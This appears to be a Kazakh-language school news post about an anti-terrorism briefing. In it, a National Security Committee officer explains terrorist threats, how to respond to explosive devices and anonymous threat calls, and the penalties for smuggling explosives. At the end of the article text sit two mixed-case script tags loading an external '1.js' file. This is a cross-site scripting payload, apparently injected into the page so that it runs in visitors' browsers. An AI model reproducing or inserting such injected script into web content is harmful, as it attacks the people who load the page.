12 наурызда №1 КОМ –де ҰҚК Терроризмге қарсы орталығы бөлімінің қызметкері Сарбасов Мадияр Жәнібекұлы мектеп ұжымының алдында маңызды ақпаратпен бөлісті.Ол террористік қауіп-қатерлер туралы, әсіресе террористік іс-әрекетке осал нысандар туралы ақпарат берді. Жарылғыш құрылғыларды анықтаған кезде және террористік сипаттағы анонимді қоңыраулар түскен кезде қалай әрекет ету керектігі туралы бейнефильм көрсетілді. Мадияр Жәнібекұлы терроризм бүкіл әлемге қауіп төндіретінін және Қазақстан Республикасының әрбір саналы азаматы бұл мәселеге жауапкершілікпен қарауы керектігін атап өтті.Содан кейін Ақмола облысындағы қызметкерлер жүргізіп жатқан шаралар мен олардың әрекеттері туралы айтты. Жасанды жарылғыш заттарды контрабандалық жолмен алып өту,сол үшін адам қандай жаза алатынын айта кетті.Мемлекет үшін ең құндысы - адам өмірі.Сондықтан мемлекет оны бар күшімен қорғайды, деді ол сөзінің соңында.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

15.03.2021

https://www.instagram.com/p/CMUxAWfs9ze/?igshid=1fndormk8rlvr

Просмотров: 226


Пікір қосу



Деректерді қолтаңбаға қосу